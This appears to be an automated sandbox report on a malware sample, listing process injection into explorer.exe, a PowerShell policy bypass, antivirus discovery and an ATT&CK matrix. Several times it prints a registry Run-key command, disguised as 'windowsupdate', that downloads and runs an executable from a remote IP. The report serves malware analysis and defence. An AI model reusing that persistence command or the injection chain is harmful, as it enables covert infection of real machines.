        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400250E0 GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,WideCharToMultiByte,GetProcAddress,GetProcAddress,WideCharToMultiByte,GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,2_2_00000001400250E0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400D5288 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00000001400D5288
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400DEBE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00000001400DEBE0

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 45.144.212.77 16000Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 208.95.112.1 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 108.128.124.3 443Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 204.79.197.203 443
        Bypasses PowerShell execution policy
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Compiles code for process injection (via .Net compiler)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\vk4yczyv.0.csJump to dropped file
        Creates a thread in another existing process (thread injection)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 10AE0000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 111A0000
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 4056 base: 10AE0000 value: E8Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 4056 base: 111A0000 value: E8
        Writes to foreign memory regions
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 10AE0000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 111A0000
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140063EB0 GetFileAttributesW,CreateProcessWithLogonW,GetLastError,CreateProcessW,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,CloseHandle,GetLastError,FormatMessageW,2_2_0000000140063EB0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014001FA50 GetCurrentThreadId,MapVirtualKeyW,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,GetForegroundWindow,GetWindowThreadProcessId,GetGUIThreadInfo,GetWindowThreadProcessId,GetKeyboardLayout,keybd_event,keybd_event,2_2_000000014001FA50
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400207C0 GetSystemMetrics,mouse_event,mouse_event,2_2_00000001400207C0
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5trl00oq\5trl00oq.cmdline"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File "C:\Users\user\AppData\Roaming\installer.ps1"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vk4yczyv.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9CAF.tmp" "c:\Users\user\AppData\Local\Temp\5trl00oq\CSC8D43AD1B76AB4ACB9D31FAE12D51980.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES9D6A.tmp" "c:\Users\user\AppData\Local\Temp\CSC95BE416761534B22A9BF915F54099EA.TMP"Jump to behavior
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: C:\Windows\System32\reg.exe reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v windowsupdate /t reg_sz /d "powershell -executionpolicy bypass -noprofile -command invoke-webrequest -uri http://45.144.212.77:16000/client -outfile c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe; start-process c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe" /f
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeProcess created: C:\Windows\System32\reg.exe reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v windowsupdate /t reg_sz /d "powershell -executionpolicy bypass -noprofile -command invoke-webrequest -uri http://45.144.212.77:16000/client -outfile c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe; start-process c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe" /f
        Source: C:\Users\user\Desktop\1ZXaFij.exeProcess created: C:\Windows\System32\reg.exe reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v windowsupdate /t reg_sz /d "powershell -executionpolicy bypass -noprofile -command invoke-webrequest -uri http://45.144.212.77:16000/client -outfile c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe; start-process c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe" /fJump to behavior
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runps.exeProcess created: C:\Windows\System32\reg.exe reg add "hkey_current_user\software\microsoft\windows\currentversion\run" /v windowsupdate /t reg_sz /d "powershell -executionpolicy bypass -noprofile -command invoke-webrequest -uri http://45.144.212.77:16000/client -outfile c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe; start-process c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\runps.exe" /fJump to behavior
        Source: 1ZXaFij.exe, 00000002.00000000.1267795847.0000000140100000.00000002.00000001.01000000.00000003.sdmp, runps.exe, 0000000C.00000000.1384740615.0000000140100000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: msctls_statusbar321No StatusBar.Press OK to continue.IsHungAppWindowahk_idpidProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
        Source: 1ZXaFij.exeBinary or memory string: Program Manager
        Source: 1ZXaFij.exe, explorer.exe, 00000017.00000000.1484230465.0000000004880000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: 1ZXaFij.exe, 00000002.00000002.1374784666.00000000007FA000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: ProgmanA
        Source: 1ZXaFij.exe, 00000002.00000000.1267795847.0000000140100000.00000002.00000001.01000000.00000003.sdmp, runps.exe, 0000000C.00000000.1384740615.0000000140100000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: ahk_groupTarget window not found.PosTarget control not found.%uCountSelectedFocusedind+-^HwndShell_TrayWndRtlGetVersionntdll.dll%u.%u.%u%s: %s...%s[%Iu of %Iu]: %-1.60s%sMinHide<object>AltTabShiftAltTabAltTabMenuAltTabAndMenuAltTabMenuDismissAbsACosASinATanCaretGetPosCeilChrComCallComObjActiveComObjConnectComObjFlagsComObjFromPtrComObjGetComObjQueryComObjTypeComObjValueCosDllCallExpFileOpenFloorFormatFormatTimeGetMethodHasBaseHasMethodHasPropInStrIsAlnumIsAlphaIsDigitIsFloatIsIntegerIsLowerIsNumberIsObjectIsSetRefIsSpaceIsTimeIsUpperIsXDigitLnLogLTrimModNumGetNumPutObjAddRefObjBindMethodObjFromPtrObjFromPtrAddRefObjGetBaseObjGetCapacityObjHasOwnPropObjOwnPropCountObjOwnPropsObjPtrObjPtrAddRefObjReleaseObjSetBaseObjSetCapacityOrdRegCreateKeyRegDeleteRegDeleteKeyRegExMatchRegExReplaceRegReadRegWriteRoundRTrimRunWaitSinSoundGetInterfaceSoundGetMuteSoundGetNameSoundGetVolumeSoundSetMuteSoundSetVolumeSplitPathSqrtStrCompareStrGetStrLenStrLowerStrPtrStrPutStrReplaceStrTitleStrUpperSubStrTanTrimTypeVarSetStrCapacityVerCompareWinActiveWinExistAhkPathAhkVersionAllowMainWindowAppDataAppDataCommonClipboardComputerNameControlDelayCoordModeCaretCoordModeMenuCoordModeMouseCoordModePixelCoordModeToolTipCursorDDDDDDDDDDefaultMouseSpeedDesktopDesktopCommonEndCharEventInfoHotkeyIntervalHotkeyModifierTimeoutHourIconFileIconHiddenIconNumberIconTipIndexInitialWorkingDirIs64bitOSIsAdminIsCompiledIsCriticalIsPausedIsSuspendedKeyDelayKeyDelayPlayKeyDurationKeyDurationPlayLanguageLastErrorLineFileLineNumberLoopFieldLoopFileAttribLoopFileDirLoopFileExtLoopFileFullPathLoopFileNameLoopFilePathLoopFileShortNameLoopFileShortPathLoopFileSizeLoopFileSizeKBLoopFileSizeMBLoopFileTimeAccessedLoopFileTimeCreatedLoopFileTimeModifiedLoopReadLineLoopRegKeyLoopRegNameLoopRegTimeModifiedLoopRegTypeMaxHotkeysPerIntervalMDayMenuMaskKeyMMMonMouseDelayMouseDelayPlayMyDocumentsNowNowUTCOSVersionPriorHotkeyPriorKeyProgramFilesProgramsProgramsCommonPtrSizeRegViewScreenDPIScreenHeightScreenWidthScriptDirScriptFullPathScriptHwndScriptNameSecStartMenuStartMenuCommonStartupStartupCommonStoreCapsLockModeThisFuncThisHotkeyTickCountTimeIdleTimeIdleKeyboardTimeIdleMouseTimeIdlePhysicalTimeSincePriorHotkeyTimeSinceThisHotkeyTitleMatchModeTitleMatchModeSpeedTrayMenuUserNameWinDelayWinDirWorkingDirYearYYYY.ahk - %sRegClassCreateWindowConsolasHICON:"%s"notepad.exeCould not open script./include "%s" /restart /script "%s"Script file not found.%s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014003AFF0 GetTickCount,GetLocalTime,2_2_000000014003AFF0
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_000000014003D400 GetComputerNameW,GetUserNameW,2_2_000000014003D400
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_00000001400011A0 GetModuleHandleW,GetProcAddress,GetVersionExW,2_2_00000001400011A0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\1ZXaFij.exeCode function: 2_2_0000000140045A80 UnhookWindowsHookEx,UnregisterHotKey,Shell_NotifyIconW,RemoveClipboardFormatListener,OleFlushClipboard,DestroyWindow,DeleteObject,DestroyIcon,DestroyIcon,RemoveMenu,DestroyMenu,DeleteObject,IsWindow,DestroyWindow,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,2_2_0000000140045A80

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Valid Accounts        		21
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        Exploitation for Privilege Escalation        		1
        Disable or Modify Tools        		11
        Input Capture        		11
        System Time Discovery        		Remote Services1
        Archive Collected Data        		13
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Native API        		1
        Valid Accounts        		1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory1
        Account Discovery        		Remote Desktop Protocol1
        Screen Capture        		11
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts11
        Command and Scripting Interpreter        		221
        Registry Run Keys / Startup Folder        		1
        Valid Accounts        		3
        Obfuscated Files or Information        		Security Account Manager3
        File and Directory Discovery        		SMB/Windows Admin Shares11
        Input Capture        		11
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts2
        PowerShell        		Login Hook1
        Access Token Manipulation        		1
        DLL Side-Loading        		NTDS36
        System Information Discovery        		Distributed Component Object Model3
        Clipboard Data        		4
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script512
        Process Injection        		11
        Masquerading        		LSA Secrets371
        Security Software Discovery        		SSHKeylogging25
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts221
        Registry Run Keys / Startup Folder        		1
        Valid Accounts        		Cached Domain Credentials251
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Modify Registry        		DCSync3
        Process Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc Filesystem11
        Application Window Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt251
        Virtualization/Sandbox Evasion        		/etc/passwd and /etc/shadow1
        System Owner/User Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
        Process Injection        		Network Sniffing1
        System Network Configuration Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
